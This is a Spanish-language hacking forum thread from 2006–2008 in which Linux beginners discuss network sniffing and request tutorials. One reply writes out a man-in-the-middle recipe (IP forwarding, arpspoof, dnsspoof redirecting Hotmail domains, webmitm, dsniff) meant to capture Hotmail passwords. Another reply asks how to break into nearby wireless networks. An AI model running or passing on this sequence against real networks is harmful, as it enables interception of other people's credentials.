elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
06 Julio 2008, 17:03  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Hacking Linux/Unix (Moderador: berz3k)
| | | |-+  Esnifer bajo linux
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Esnifer bajo linux  (Leído 2148 veces)
Kase
Desconectado Desconectado

Tavrist

Ver Perfil WWW
Esnifer bajo linux
« en: 16 Julio 2006, 23:52 »

estuve buscando en  el foro.. y no veo  nada en concreto sobre los sniffers  bajo linux  o.O
mi idea  seria hacer  algo parecido al taller practico de intrusion a redes  por gospel   o.o  pero recopilatorio..  por todos los que usamos linux. y nos intersa  aprender y enseñar este tema  o.o

ojala alguien me apoye  a  poner en este  post  lo basico sobre sniff

acabo de empezar con linux ase 1 mes kisas. y  asta este momento que creo que ya solucione mis probleas xD  y ya  poseo  2 computadoras  para para ponerme a practicar un poco

los temas que me intersa   es el envenenaniemto  arp  + sniffear     para hacer  man in the middle       
tambien quiero ver como snifear una red  alambrica  formando parte de la red. pero yo inalambrico   

asi que ya empesare con este tema   y pondre mis resumenes y mis  practicas    :P  (  esperen anciosos.. bueno kisas no tanto xD)
 y tambien si alguien kiere aportar pos el  post ya esta avierto  =)
« Última modificación: 16 Febrero 2008, 22:47 por ANELKAOS » En línea

zhyzura
Sie sind nicht wie die anderen
Colaborador

"dieses ist es unsere Welt"

Ver Perfil
Re: sniffear bajo linux
« Respuesta #1 en: 17 Julio 2006, 20:31 »

quizas dentro de unas semanitas comienzo un taller en GNU/Linux para mover un poco mas este foro, solo termino el tuto de hacking basico que en esta semana retomo nuevamente(ya lo tenia abandonado).

ya tengo una prectica de hijacking solo que no la he escrito por razones de tiempo jeje.

tambien quiero ver como snifear una red  alambrica  formando parte de la red. pero yo inalambrico   
dejame hacer unas pruebas al respecto y ya veremos como solucionar eso, mi pc en un portatil con wireless solo que hoy cambio de disco duro por uno de 100 por lo tanto espero pronto andar normalito, instalar debian de nuevo creo que va a ser tardado(me sirve de repaso).

- - -->>  Sie urteilen zu uns seiend unterschiedlich  <<-- - -
unser Durst des
Wissens ist unersättlich
Kase

Tavrist

Ver Perfil WWW
« Respuesta #2 en: 18 Julio 2006, 08:13 »

que bien  que  tu me apoyes.. y eske si falta mover este foro.. casi no tiene temas ¬¬

estoy chekando los snifers en linux... andar probando uno y otro..  y espero poder poner algo de  informacion de lo que e aprendido este fin... ^^
solo que orita toy peliando con mi linux por que no me deja jugar ¬¬

sobre lo de snifear alambrico desde wireless  .. o.o ise un intento. pero no capturava nada de trafico... y de eso no puedo  probar orita.. asta que entre ala escuela en 1 mes mas  o.o

espero tengas suerte
=)

vrom
*

Ver Perfil
« Respuesta #3 en: 23 Julio 2006, 02:43 »

rocoro
*

Ver Perfil
« Respuesta #4 en: 19 Septiembre 2006, 15:14 »

Usando dsniff.---Prueba para tratar de sacar contraseñas de hotmail
Estoy probando con la suite dsniff.
1. Maquina atacante-linux redhat9
2.- maquina atacada--ip_maquina_atacada
3.- Gateway--ip_gateway.

Habilito el linux para que el trafico pase por el
echo 1 > /proc/sys/net/ipv4/ip_forward
envenenamiento de tablas arp
arpspoof -t ip_maquina_atacada ip_gateway
habilito linux para hacer creer a la maquina atacada que soy el dns
dnsspoof -f archivo.hosts
el archivo hosts debe tener las ip que se supone que la maquina atacada va a tratar de acceder, en este caso hotmail.
ip_maquina_atacante  *.hotmail.com
ip_maquina_atacante *.passport.com
ip_maquina_atacante  *.passport.net

Corro webmitm -d
En este momento si no esta generado el archivo webmitm.crt empezará la creacion, este ese el certificado que se debe lanzar a la maquina atacada una vez que entre a la zona segura de hotmail.

Bueno , y aqui es donde voy, por alguna razon que desconozco, en la maquina atacada de prueba con windows xp sp2, nunca me aparece el warning advirtiendome del certificado.
Si alguien sabe por donde va la falla se lo agradeceria.

si corro dsniff -d
Si me funciona para obtener todos los passwords en texto plano.

Salu2
antraXactive

dpkg --purge sgae

Ver Perfil WWW
« Respuesta #5 en: 19 Septiembre 2006, 23:27 »

zhyzura
Colaborador

Ver Perfil
« Respuesta #6 en: 25 Septiembre 2006, 05:00 »

a mi punto de vista es mejor dsniff que ettercap debido a sus opciones

unser Durst des
Wissens ist unersättlich
sxmxone!
*

Ver Perfil
« Respuesta #7 en: 17 Noviembre 2007, 17:39 »

quizas dentro de unas semanitas comienzo un taller en GNU/Linux para mover un poco mas este foro, solo termino el tuto de hacking basico que en esta semana retomo nuevamente(ya lo tenia abandonado).

ya tengo una prectica de hijacking solo que no la he escrito por razones de tiempo jeje.

tambien quiero ver como snifear una red alambrica formando parte de la red. pero yo inalambrico
dejame hacer unas pruebas al respecto y ya veremos como solucionar eso, mi pc en un portatil con wireless solo que hoy cambio de disco duro por uno de 100 por lo tanto espero pronto andar normalito, instalar debian de nuevo creo que va a ser tardado(me sirve de repaso).

Una pregunta, como podria hackear las redes que aparecen en el aire bajo linux(Ubuntu) ze podra eztoy bien verde en ezto y noze como podria sniffar la red o poder capturar paquetes, algun tutorial me vendria bien...

Zaludoz!

sumzone!
XayOn
*

Ver Perfil WWW
« Respuesta #8 en: 11 Diciembre 2007, 01:25 »

Para SXMXONE:
Trastea con aircrack-ng. (incluye airodump-ng)

ZhyZura: no soy muy amigo de los foros, la interfaz web tan llena de coloridos me horroriza (soy mas de news/mailing lists ;-) ), sin embargo, acabo de llegar a este foro, atraido por el proyecto wifislax, si un proyecto como ese ha nacido aqui... :^P y yo tambien me apunto a animar esta sección.

No me van demasiado los troyanos, pero reconozco que pueden tener su utilidad. ¿Alguien a pensado alguna vez en troyanos con clientes/servidores multiplataforma? Si, hay utilidades de control remoto no-ocultas muy buenas, como ssh, por ejemplo e incluso he llegado a ver ocultas, como una que saco XpyXT de la cual no he vuelto a saber mas, realmente no utilizo troyanos, pero es como los juegos: No juego a nada, casi nunca, (frozen-bubble y smc se salvan) pero tengo wine instalado en mi sistema con 30gb de juegos, solo para probarlos, demostrar que en linux no hay ataduras de ningun tipo y se puede hacer, supongo que me afecta bastante el concepto de linux que tiene la gente...

Que la fuerza os acompañe.

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS dpu s: a--- C++++ UL++++ P++++ L+++ E--- W+++ N+++ o+ K- w---
O M+ V- PS+ PE+++ Y PGP++ t--- 5 X+++ R tv+++ b++++ DI--- D+++
G+ e- h++ r+++ y++++
------END GEEK CODE BLOCK------

--XayOn--

Linux registered user #446872
BBOYHACK

#Bboyhacks#

Ver Perfil WWW
« Respuesta #9 en: 06 Enero 2008, 06:21 »

me parece genial lo de snifear en linux bueno yo atualmente estoy provando el back track 3 beta esta muy bueno he provado la parte de wirelles y esta perfecta

bueno espero a que ponga un tuto de snifiar para praticar

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows

Blackhacking.no-ip.org
vitaepe
*

Ver Perfil
« Respuesta #10 en: 16 Febrero 2008, 20:32 »

;D Saludos ante todo, tengo tiempo ya revisando este foro y me a sorprendido mucho la info que ahi aqui, yo ya llevo mas de un mes revisando linux para ser mas preciso tengo mas preferencia por la distro ubuntu, estoy interesado en el tema de sniffer si es que pudieramos comenzar con paso po paso no soy ducho en el tema, pero revisando un poco aun tegno muchas dudas, esperando que las pueda tratar aqui saludos!!
« Última modificación: 16 Febrero 2008, 20:36 por vitaepe » En línea
zhyzura
Colaborador

Ver Perfil
Re: Esnifer bajo linux
« Respuesta #11 en: 22 Febrero 2008, 06:24 »

espero pronto agarrar un equipo en el cual pueda correr un linux de 32 bits y comenzar varios tutos al respecto del tema, la verdad me las he visto negras teniendo mi linux en un ppc...

saludos

unser Durst des
Wissens ist unersättlich
BBOYHACK

#Bboyhacks#

Ver Perfil WWW
« Respuesta #12 en: 22 Febrero 2008, 23:39 »

espero los tutoriales me serian de gran ayuda amigo

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows

Blackhacking.no-ip.org
vitaepe
*

Ver Perfil
« Respuesta #13 en: 28 Abril 2008, 04:17 »

espero pronto agarrar un equipo en el cual pueda correr un linux de 32 bits y comenzar varios tutos al respecto del tema, la verdad me las he visto negras teniendo mi linux en un ppc...

saludos

Espero que no te hallas olvidado de los tutos serian interesante si pueden haer un laboratorio para novatos en los que me incluyo  ;D
Páginas: [1] Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.